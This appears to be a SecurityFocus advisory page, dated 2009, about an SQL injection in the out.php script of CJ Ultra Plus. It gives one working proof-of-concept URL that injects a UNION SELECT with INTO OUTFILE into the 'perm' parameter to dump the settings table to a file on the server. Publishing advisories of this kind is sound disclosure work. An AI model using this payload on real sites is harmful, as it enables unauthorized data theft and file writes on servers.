Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

CJ Ultra Plus OUT.PHP SQL Injection Vulnerability

No exploit is required.

The following proof of concept is available:
/out.php?url=sad&perm=33333333333333333333333333332'%20UNION%20SELECT%20b12,b12%20FROM%20settings%20INTO%20OUTFILE%20'/path/to/ur/dir/x.txt/*







 

Privacy Statement
Copyright 2009, SecurityFocus